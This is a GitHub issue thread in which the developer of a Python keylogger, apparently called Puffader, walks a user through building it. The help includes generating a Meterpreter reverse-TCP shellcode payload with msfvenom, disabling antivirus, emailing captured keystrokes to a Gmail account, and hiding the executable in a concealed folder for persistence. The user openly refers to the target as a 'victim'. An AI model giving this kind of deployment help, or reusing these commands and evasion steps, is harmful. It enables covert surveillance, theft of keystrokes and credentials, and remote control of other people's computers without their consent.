xp4xbox / Puffader

Python 2.7 is obsolete, please use https://github.com/xp4xbox/Python-Keylogger
MIT License

[HELP] Meterpreter #51

Closed XLuma closed 6 years ago

XLuma commented 6 years ago

OS: [e.g. Windows 10] Commit/Build: [e.g. b227928]

Is Meterpreter needed when compiling ? If yes, how do I generate raw shellcode for that ?

XLuma commented 6 years ago

@xp4xbox

xp4xbox commented 6 years ago

You just need the raw shellcode, to generate it:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f python

it should generate something like:

buf = "\x06\x06"
buf += "\0x85"
buf += "\0x04"

so all you have to do is remove the buf = and buf += so the final shellcode should be on a single line such as: \x06\x06\0x85\0x04.

XLuma commented 6 years ago

I would need to install the msfvenom framework first right ?

xp4xbox commented 6 years ago

Metasploit comes with msfvenom. So all you need to install is the metasploit framework.

btw you can edit your comments.

XLuma commented 6 years ago

Alright, thanks for the help ! I’ll test it tomorrow ! (And yeah just saw that lol) And since you are here, do I need to do the same thing with your Python backdoor ?

xp4xbox commented 6 years ago

No, my python backdoor is completely independent. It is basically my take on a smaller version of meterpreter.

XLuma commented 6 years ago

Alright, thanks for the help ! Can’t wait to test those programs :p

XLuma commented 6 years ago

When I'm attempting to run the command (or view options) I'm always getting this error

C:/metasploit-framework/embedded/framework/lib/msf/core/payload/android.rb:117:in `generate_jar': android/apk/classes.dex not found (RuntimeError)
    from C:/metasploit-framework/embedded/framework/lib/msf/core/payload/android.rb:38:in `generate'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/payload.rb:204:in `size'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) in recalculate'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:102:in `each_pair'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:102:in `block in recalculate'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:98:in `each_pair'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/payload_set.rb:98:in `recalculate'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:248:in `each'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:in `each'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:121:in `simplify'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:73:in `create'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:46:in `init_framework'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:55:in `framework'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:326:in `<main>'

any fix for that ?

xp4xbox commented 6 years ago

I am not sure, probably antivirus deleted the files. Make sure to turn your antivirus off and re-install metasploit.

XLuma commented 6 years ago

alright I'll try

XLuma commented 6 years ago

disabled my antivirus and reinstalled now I'm getting a different error from the previous

xp4xbox commented 6 years ago

What's the error?

XLuma commented 6 years ago

C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `initialize': Invalid argument @ rb_sysopen - C:/metasploit-framework/embedded/framework/modules/payloads/singles/cmd/windows/download_exec_vbs.rb (Errno::EINVAL)
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `open'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:77:in `read_module_content'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:126:in `load_module'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:238:in `block in load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:49:in `block (2 levels) in each_module_reference_name'
    from C:/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-core-0.1.13/lib/rex/file.rb:133:in `block in find'
    from C:/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `catch'
    from C:/metasploit-framework/embedded/lib/ruby/gems/2.3.0/gems/rex-core-0.1.13/lib/rex/file.rb:132:in `find'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:40:in `block in each_module_reference_name'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:30:in `foreach'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/directory.rb:30:in `each_module_reference_name'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/modules/loader/base.rb:237:in `load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:in `each'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    from C:/metasploit-framework/embedded/framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:121:in `simplify'
    from C:/metasploit-framework/embedded/framework/lib/msf/base/simple/framework.rb:73:in `create'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:46:in `init_framework'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:234:in `dump_payloads'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:306:in `block in <main>'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:303:in `each'
    from C:/metasploit-framework/bin/../embedded/framework/msfvenom:303:in `<main>'

XLuma commented 6 years ago

finally got it to work ! just need to find my LPORT

xp4xbox commented 6 years ago

Lport can be any valid port. Such as 4444.

XLuma commented 6 years ago

Finally ! I successfully built the program to a .exe, I’ll test it

Thanks for the help !

XLuma commented 6 years ago

So I tested on VM, I bet the program successfully launched because a cmd opened for like 0.1 second

I set the timer for 120 seconds and specified an email to save the logs

But after 120 seconds, no logs in the specified path and email. Is there something I'm missing ?

xp4xbox commented 6 years ago

I am not sure why, but you cannot currently save logs to disk and email, you must have one or the other. By default it will send to your email, check in your Gmail to make sure that you allowed access for less secure apps.

XLuma commented 6 years ago

so I enabled everything and made sure access for less secure app is enabled for the program, got it working but I'm not getting any logs... maybe it's because of the email (and also the storing option is via email, no other option is enabled)

xp4xbox commented 6 years ago

Make sure your username and password are entered correctly. Other than that, I am not sure.

XLuma commented 6 years ago

Tested it on my own machine, it worked perfectly. Does the program work if used on other computers that have a different IP from where it has been compiled ?

xp4xbox commented 6 years ago

IP has nothing to do with it, there have been problems in the past with py2exe and fresh operating systems.

XLuma commented 6 years ago

So the PC must have been up for like 5-10 minutes for the program to be running well ?

xp4xbox commented 6 years ago

No, I mean PCs that haven't installed a lot of software such as Microsoft C++ packages.

XLuma commented 6 years ago

Ooooh okay. Well, thanks for the help ! Very appreciated. Oh and since you are there I’d like to ask

Would it be possible to make some kind of installer ? Currently even with the added to startup, if the victim deletes the .exe, the keylogger doesn’t have a point, so making an installer that « installs » the keylogger to a specific path without asking for a path so it is « hidden » would be more handy

xp4xbox commented 6 years ago

I did do that, it doesn't work?

XLuma commented 6 years ago

Adding the program to startup won’t work if the program is deleted right ?

xp4xbox commented 6 years ago

It should since it copies itself to a hidden folder.

XLuma commented 6 years ago

Oh okay then. Thanks for the help, I’m now good :)